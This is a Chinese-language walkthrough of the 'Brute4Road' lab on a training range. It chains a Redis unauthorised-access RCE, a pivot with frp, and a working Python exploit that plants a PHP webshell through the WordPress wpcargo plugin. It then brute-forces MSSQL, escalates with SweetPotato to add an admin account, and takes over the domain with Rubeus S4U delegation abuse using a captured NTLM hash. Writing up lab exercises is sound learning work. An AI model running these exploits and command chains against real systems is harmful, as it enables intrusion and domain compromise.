春秋云镜-Brute4Road
外网 redis 未授权
fscan 扫完发现 redis 开放且未授权,但是权限较低,尝试用 msf 的 redis_replication_cmd_exec 去打主从复制 rce 但是没成功(
use exploit/linux/redis/redis_replication_cmd_exec
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set rhosts 39.98.117.235
rhosts => 39.98.117.235
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set rport 6379
rport => 6379
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set lhost att-vps-ip
lhost => att-vps-ip
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set srvhost att-vps-ip
srvhost => att-vps-ip
msf6 exploit(linux/redis/redis_replication_cmd_exec) > run后来妥协了,用了破坏性强的redis-rogue-server,这个只能打一次,如果 shell 断了就重启吧,lhost 填你的 vps
python -c 'import pty; pty.spawn("/bin/bash")'经典 suid 提权
内网WordPress
wget 下我们的代理和 fscan,netstat -ano 看下
在这个不稳定的 shell 情况下上 frp 用这个,不然无法退出
nohup ./frpc -c ./frpc.toml >/dev/null 2>&1 &[redis@centos-web01 db]$ netstat -ano
netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 0.0.0.0:6379 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.22.2.7:34792 100.100.30.25:80 ESTABLISHED off (0.00/0/0)
tcp 0 14 172.22.2.7:59732 8.147.108.183:2333 ESTABLISHED on (0.20/0/0)
tcp 0 0 172.22.2.7:53566 100.100.0.19:80 TIME_WAIT timewait (47.44/0/0)
tcp 0 0 172.22.2.7:45904 100.100.202.194:443 TIME_WAIT timewait (58.71/0/0)
tcp 0 0 172.22.2.7:54816 100.100.80.92:8080 TIME_WAIT timewait (33.51/0/0)
tcp 0 0 172.22.2.7:48934 113.45.23.73:7100 ESTABLISHED keepalive (7054.55/0/0)
tcp 40 0 172.22.2.7:6379 8.147.108.183:41578 ESTABLISHED keepalive (130.27/0/0)
tcp 0 0 172.22.2.7:53502 100.100.0.19:80 TIME_WAIT timewait (32.44/0/0)
tcp6 0 0 :::80 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::21 :::* LISTEN off (0.00/0/0)
tcp6 0 0 ::1:25 :::* LISTEN off (0.00/0/0)
udp 0 0 0.0.0.0:68 0.0.0.0:* off (0.00/0/0)
udp 0 0 127.0.0.1:323 0.0.0.0:* off (0.00/0/0)
udp6 0 0 ::1:323 :::* off (0.00/0/0)网络信息
172.22.2.3(内网域控)
172.22.2.7(外网redis)
172.22.2.16(内网mssql)
172.22.2.18(内网WordPress)
172.22.2.34(内网主机)WordPress 有个 nday ,脚本写马进去,然后再连蚁剑
import sys
import binascii
import requests
# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'
def encode_character_code(c: int):
return '{:08b}'.format(c).replace('0', 'x')
text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]
destination_url = 'http://172.22.2.18/'
cmd = 'ls'
# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)
# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))
发现数据库连接信息
给了 flag 和一些密码
mssql
用上面的那个密码本去爆破一下,密码为:ElGNkOiC
./fscan_amd64 -h 172.22.2.16 -m mssql -pwdf passwd.txtMDUT连接
传文件要开这个选项
sweetpotato 提权
C:/Users/Public/sweetpotato.exe -a "net user aniale kita@0529 /add"
添加用户然后 rdp
C:/Users/Public/sweetpotato.exe -a "net user aniale kita@0529 /add"
C:/Users/Public/sweetpotato.exe -a "net localgroup administrators aniale /add"
域内
systeminfo 发现在域内
传猕猴桃上去抓 hash,有MSSQLSERVER$这个用户,MSSQLSERVER 配置了到域控的约束委派, 可以通过 S4U 伪造高权限 ST 拿下域控,并且似乎只有他的NTLM哈希可用,我们用Rubeus申请访问自身的服务票据
.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:3c6c0709e5d7f89d022b6792384d1371 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:你上面抓到的服务票据然后就有域控了,忘了存最后一张图,这里不太明白,之后再学习吧
type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt